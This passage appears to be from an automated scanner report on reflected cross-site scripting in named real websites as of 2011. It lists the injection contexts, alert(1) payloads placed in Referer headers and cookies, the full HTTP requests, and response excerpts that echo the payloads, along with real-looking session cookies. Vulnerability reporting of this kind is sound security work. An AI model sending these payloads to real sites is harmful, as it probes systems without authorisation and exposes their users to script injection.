This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Windows/Ensuring-Smooth-Upgrade-Path-with-Windows-Vista/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d0f65"-alert(1)-"c511ed18c94
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f10f0"><script>alert(1)</script>01bad51f7bd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Windows/Ensuring-Smooth-Upgrade-Path-with-Windows-Vista/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=f10f0"><script>alert(1)</script>01bad51f7bd
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71fdc"-alert(1)-"4ce6adf9d90 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/a/Windows/How-to-Accurately-Plan-for-Windows-Server-2008-Hardware/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=71fdc"-alert(1)-"4ce6adf9d90
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head>
<title>How to Accurately Plan for Windows Server 2008 Hardware - Windows - News & Reviews - eWeek.com</title> <meta nam ...[SNIP]... <!-- s.pageName="How to Accurately Plan for Windows Server 2008 Hardware-Page001-50215" s.referrer = "http://www.google.com/search?hl=en&q=71fdc"-alert(1)-"4ce6adf9d90" s.server="" s.channel="eWEEK Home> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ca1d"><script>alert(1)</script>f5c4acd6847 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/a/Windows/How-to-Accurately-Plan-for-Windows-Server-2008-Hardware/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=8ca1d"><script>alert(1)</script>f5c4acd6847
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <html> <head>
<title>How to Accurately Plan for Windows Server 2008 Hardware - Windows - News & Reviews - eWeek.com</title> <meta nam ...[SNIP]... <input type="text" value="8ca1d"><script>alert(1)</script>f5c4acd6847" name="q" size="30"> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5147d"-alert(1)-"4b20e967be2 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /c/s/Videos/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=5147d"-alert(1)-"4b20e967be2
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10669"><script>alert(1)</script>a957892fc55 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /c/s/Videos/ HTTP/1.1 Host: www.eweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=10669"><script>alert(1)</script>a957892fc55
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13087'-alert(1)-'3c02ec02ea8 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /modules/buttons/buttons.php?urls=http%3A//www.fotoatelier-berlin.de/%7Chttp%3A//wirtschaftsthemen.net/unternehmen/karriere/eine-frauenquote-koennte-tausende-arbeitsplaetze-vernichten/006920.html%7Chttp%3A//www.w7o.de/%7Chttp%3A//www.nmworkwear.de/index.php%3FcPath%3D2_3%7Chttp%3A//www.fitness-gesundheit.biz/die-gelenkbelastung-der-unteren-extremitaten-beim-nordic-walking/%7Chttp%3A//wirtschaftsthemen.net/politik/ausland/der-westen-opfert-aegyptens-demokratie-seiner-paranoia/006911.html%7Chttp%3A//www.mittelstandsblog.de/2011/02/gfk-prognose-deutsche-2011-noch-konsumfreudiger/%7Chttp%3A//www.breitband-anbieter.com/news/iphone-5-ipad-2-und-die-lte-tarife-der-deutschen-telekom-659000/ HTTP/1.1 Host: www.kledy.de Proxy-Connection: keep-alive Referer: http://www.google.com/search?hl=en&q=13087'-alert(1)-'3c02ec02ea8 Cache-Control: max-age=0 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=gd27lfmj2ui4qbk3nni47kv9tvnpfun3; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%2C%22ee%22%3A%7B%22WibiyaConnect%22%3A1%7D%7D
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 594e8'-alert(1)-'df58a5a7282 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET / HTTP/1.1 Host: www.protopage.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: 594e8'-alert(1)-'df58a5a7282
<!-- Copyright 2004-2008 Protopage Ltd. All rights reserved. --> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Pro ...[SNIP]... ":1,"tag":"YP"},{"count":1,"tag":".........."}]); var feedHistory = new Object(); var pageParams = new Object(); pageParams['currentPagePath'] = 'protopage/autocreate'; pageParams['autoAddFeedUrl'] = '594e8'-alert(1)-'df58a5a7282'; pageParams['pagePathAttempted'] = 'protopage/autocreate'; var categories = [{ "id": 1, "virtualPages": [], "sharing": {"type": "public"}, "label": "My public category", "schemeOffset": " ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6b85f'-alert(1)-'16845b9d6f0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=6b85f'-alert(1)-'16845b9d6f0
Response
HTTP/1.1 200 OK Server: SFDC Is-Processed: true Content-Type: text/html Date: Sat, 05 Feb 2011 22:09:38 GMT Connection: close Content-Length: 498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en ...[SNIP]... <script> if (window.location.replace){ window.location.replace('http://www.google.com/search?hl=en&q=6b85f'-alert(1)-'16845b9d6f0'); } else {; window.location.href ='http://www.google.com/search?hl=en&q=6b85f'-alert(1)-'16845b9d6f0'; } </script> ...[SNIP]...
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a87a4'-alert(1)-'332831740db was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /servlet/servlet.WebToLead HTTP/1.1 Host: www.salesforce.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=a87a4'-alert(1)-'332831740db
Response
HTTP/1.1 200 OK Server: SFDC Is-Processed: true Content-Type: text/html Date: Sat, 05 Feb 2011 22:09:46 GMT Connection: close Content-Length: 498
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <html> <head> <meta HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE"> <meta http-equiv="Refresh" content="0; URL=http://www.google.com/search?hl=en ...[SNIP]... <script> if (window.location.replace){ window.location.replace('http://www.google.com/search?hl=en&q=a87a4'-alert(1)-'332831740db'); } else {; window.location.href ='http://www.google.com/search?hl=en&q=a87a4'-alert(1)-'332831740db'; } </script> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4badd"><script>alert(1)</script>e85683b5f8e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /subscribe/newsubs/atshcstep1.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=4badd"><script>alert(1)</script>e85683b5f8e
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:58 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 2616 Content-Type: text/html Expires: Sat, 05 Feb 2011 22:08:58 GMT Set-Cookie: ASPSESSIONIDCACARTTB=ILBALOKCLOOOFFHOCCLCGBLH; path=/ Cache-control: no-cache
<html> <head> <title>Athletic Training & Sports Health Care Subscription</title> </head> <style> a,body,td, p, blockquote, H5 { font-family: arial, helvetica, sans-serif; font-size:12px; ...[SNIP]... <input type="hidden" name="referer" value="http://www.google.com/search?hl=en&q=4badd"><script>alert(1)</script>e85683b5f8e"> ...[SNIP]...
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6715"><script>alert(1)</script>b8dcd15839f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /subscribe/newsubs/otistep1.asp HTTP/1.1 Host: www.slackinc.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=d6715"><script>alert(1)</script>b8dcd15839f
Response
HTTP/1.1 200 OK Connection: close Date: Sat, 05 Feb 2011 22:09:51 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 2598 Content-Type: text/html Expires: Sat, 05 Feb 2011 22:08:51 GMT Set-Cookie: ASPSESSIONIDCACARTTB=BHBALOKCGKLINLCECBKOMGBN; path=/ Cache-control: no-cache
The value of the Referer HTTP header is copied into an HTML comment. The payload 9d42c--><script>alert(1)</script>aa4b544d90d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /index.php/sso_checker HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; __utmz=204527314.1296947359.3.3.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; XARAYASID=f9dtn7oaue1nupeh7s4dpfokt0; splunk_com_uid=1; Apache=173.193.214.243.1296947376244858; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; splunk_com_xt_uid=1; PHPSESSID=afumuefdbn5a7tsaitu6o38uq5; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942985.1296947359.3; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8; Referer: 9d42c--><script>alert(1)</script>aa4b544d90d
Response (redirected)
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 16:02:45 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18315
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the UID cookie is copied into the HTML document as plain text between tags. The payload 2759a<script>alert(1)</script>1bb4d3cca3c was submitted in the UID cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-12944568102759a<script>alert(1)</script>1bb4d3cca3c
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:04 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:04 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:04 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296999604; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25239
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264255445",Pid:"p68511049",Arc:"185637072",Location: ...[SNIP]... ); }else{if(window.attachEvent){return window.attachEvent("onload",C.OnReady.onload); }}}}}},f:[],done:false,timer:null};})();}COMSCORE.BMX.Broker.Cookies={ "UID": '1d29d89e-72.246.30.75-12944568102759a<script>alert(1)</script>1bb4d3cca3c', "ar_p67161473": 'exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&', "ar_p85001580": 'exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb ...[SNIP]...
The value of the ar_p45555483 cookie is copied into the HTML document as plain text between tags. The payload a34ba<script>alert(1)</script>3f699f38ea9 was submitted in the ar_p45555483 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
GET /bmx3/broker.pli?pid=p68511049&PRAd=264255445&AR_C=185637072 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&a34ba<script>alert(1)</script>3f699f38ea9; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 06 Feb 2011 13:40:02 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: ar_p68511049=exp=6&initExp=Mon Jan 31 16:31:23 2011&recExp=Sun Feb 6 13:40:02 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:02 GMT; path=/; domain=.voicefive.com; Set-Cookie: BMX_G=method->-1,ts->1296999602; path=/; domain=.voicefive.com; Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 25239
if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"264255445",Pid:"p68511049",Arc:"185637072",Location: ...[SNIP]... d Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&', "ar_p45555483": 'exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&a34ba<script>alert(1)</script>3f699f38ea9', "ar_p83612734": 'exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&', "ar_p68511049": 'exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:1 ...[SNIP]...
The value of the ar_p67161473 cookie is copied into the HTML document as plain text between tags. The payload 99107<script>alert(1)</script>48b53053bd9 was submitted in the ar_p67161473 cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Request
